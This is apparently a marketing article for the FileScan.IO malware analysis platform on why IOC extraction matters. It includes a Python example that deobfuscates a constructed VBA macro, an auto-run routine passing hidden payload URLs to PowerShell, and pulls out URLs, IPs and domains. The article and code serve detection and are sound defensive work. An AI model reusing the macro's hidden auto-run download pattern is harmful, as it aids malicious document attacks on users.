Let's start out by describing the problem, followed by our solution.
We need more than detection
We all know that fast and effective response within the incident response cycle is key. Yes, speed matters, but so do diligence and depth of analysis. Today, dealing with malware and social engineering threats involves more than the binary question of a good/bad verdict. First of all, there are many shades of grey. Secondly, a full understanding of the impact of a potential threat (why is it bad? what capabilities are present? what underlying network infrastructure is being used?) is vital to a complete IT security workflow. At the very minimum, an analysis system needs to be able to extract embedded Indicators of Compromise ("IOCs") for pre-emptive measures, e.g. to detect a potential breach or to perform active threat hunting in a post-breach scenario. Thus far, mostly due to heavy obfuscation and encryption, only actual execution of malware (typically within an isolated environment, also known as dynamic analysis) has been able to extract the key IOCs (e.g. network IPs, URLs, domains) on a consistent basis. However, standing up a scalable array of virtual machines in order to scan every file (or URL) comes with a lot of overhead: maintaining an array of VM image snapshots, applying security updates, filtering out white noise, meeting hardware requirements, accepting limited throughput, and so on.
Why are IOCs important?
As mentioned, purely detecting malware is not enough. Only by uncovering the potential IOCs, which are often hidden behind many layers of obfuscation (e.g. an obfuscated VBA macro calling PowerShell, which eventually downloads a file), does it become possible to perform better attribution and to understand the nature of an attack. Furthermore, IOCs lead to the detection of other potentially compromised endpoints and allow preemptive protection of assets, e.g. by blocking the underlying network IPs/domains in your firewall (thereby avoiding data corruption and exfiltration).
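The "peel back the obfuscation, then pull out the IOCs" step described above, as an added example that is not FileScan.IO's code: a small static resolver for concatenated VBA string literals, Chr() calls and intermediate variables, followed by URL, IP and domain extraction. The macro fragment, the address 198.51.100.23 (documentation range) and the host files.example.net are constructed sample data; real-world obfuscation goes far beyond this (which is exactly the page's argument for dynamic analysis), so the code shows the shape of the problem rather than a production extractor.

```python
import ipaddress
import re
from typing import Dict, List
from urllib.parse import urlsplit

# Constructed sample macro: the URLs are split across literals, a Chr()
# call and intermediate variables before being handed to PowerShell.
SAMPLE_MACRO = r'''
Sub AutoOpen()
    Dim h As String, u As String, f As String
    h = "ht" & Chr(116) & "p://"
    u = h & "198.51.100" & ".23/" & "upd" & "ate.bin"
    f = "https://" & "files.ex" & "ample.net/" & "upd" & "ate.bin"
    Shell "powershell.exe " & u & " " & f, vbHide
End Sub
'''

CHR_CALL = re.compile(r'Chr\((\d+)\)')
CONCAT = re.compile(r'"([^"]*)"\s*&\s*"([^"]*)"')
ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*"([^"]*)"\s*$')
TOKEN = re.compile(r'"[^"]*"|[^"]+')          # literal / non-literal segments
STRING_LIT = re.compile(r'"([^"]*)"')
IDENT = re.compile(r'\b\w+\b')

URL_RE = re.compile(r'https?://[^\s"\'<>]+', re.IGNORECASE)
IPV4_RE = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')
DOMAIN_RE = re.compile(r'\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b', re.IGNORECASE)
# File names look like domains to a naive regex; a public-suffix list would
# be the proper filter, this denylist is a stand-in for the example.
NOT_TLDS = {'exe', 'dll', 'ps1', 'bin', 'vbs', 'txt', 'doc', 'docm', 'dat', 'tmp'}


def fold_literals(line: str) -> str:
    """Turn Chr(n) into a literal and merge adjacent "a" & "b" literals until stable.
    Escaped quotes ("") inside literals are not handled in this example."""
    line = CHR_CALL.sub(lambda m: '"' + chr(int(m.group(1))) + '"', line)
    prev = None
    while prev != line:
        prev, line = line, CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', line)
    return line


def substitute_vars(line: str, env: Dict[str, str]) -> str:
    """Replace already-resolved variables, but only outside string literals."""
    pieces = []
    for tok in TOKEN.findall(line):
        if tok.startswith('"'):
            pieces.append(tok)
        else:
            pieces.append(IDENT.sub(
                lambda m: '"' + env[m.group(0)] + '"' if m.group(0) in env else m.group(0), tok))
    return ''.join(pieces)


def deobfuscate(macro: str) -> List[str]:
    """Resolve the macro line by line and return every string literal that remains."""
    env: Dict[str, str] = {}
    strings: List[str] = []
    for raw in macro.splitlines():
        line = fold_literals(substitute_vars(raw, env))
        m = ASSIGN.match(line)
        if m:                      # x = "fully resolved literal" -> remember it
            env[m.group(1)] = m.group(2)
        strings.extend(STRING_LIT.findall(line))
    return strings


def extract_iocs(strings: List[str]) -> Dict[str, List[str]]:
    """Pull URLs, IPv4 addresses and domains out of resolved strings."""
    found = {'urls': set(), 'ips': set(), 'domains': set()}
    for s in strings:
        urls = URL_RE.findall(s)
        found['urls'].update(urls)
        # URL hosts are classified below together with bare mentions.
        text = s + ' ' + ' '.join(urlsplit(u).hostname or '' for u in urls)
        for ip in IPV4_RE.findall(text):
            try:
                addr = ipaddress.ip_address(ip)
            except ValueError:     # e.g. an octet above 255
                continue
            if not (addr.is_loopback or addr.is_link_local or addr.is_multicast or addr.is_unspecified):
                found['ips'].add(ip)
        for dom in DOMAIN_RE.findall(text):
            if dom.rsplit('.', 1)[-1].lower() not in NOT_TLDS:
                found['domains'].add(dom.lower())
    return {k: sorted(v) for k, v in found.items()}


if __name__ == '__main__':
    for kind, values in extract_iocs(deobfuscate(SAMPLE_MACRO)).items():
        print(kind, values)
```

Version-like strings (1.2.3.4) and anything that needs arithmetic, Replace() chains or runtime-built arrays will slip past a resolver this simple; that gap is where a sandbox still earns its place in the pipeline.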
Is traditional sandboxing the silver bullet?
IOC Extraction Today
However, for a low volume of files (and for forensic purposes alike), traditional sandboxing becomes a useful add-on in a pipelined approach. So how do we reduce the total input? Using white-/blacklists helps, but only so much, as they are often based on the file hash, a lagging indicator. Modern malware campaigns are run with thousands of automatically generated malware samples that are fresh and unknown.
Rapid IOC Feedback Loop
FileScan.IO is a next-gen malware assessment platform with the following emphasis:
- Providing rapid and in-depth threat analysis services capable of high-volume processing (both for files and URLs)
- Focus on Indicator-of-Compromise (IOC) extraction and actionable context
- Cloud-native analysis in AWS (optional)
Want more information?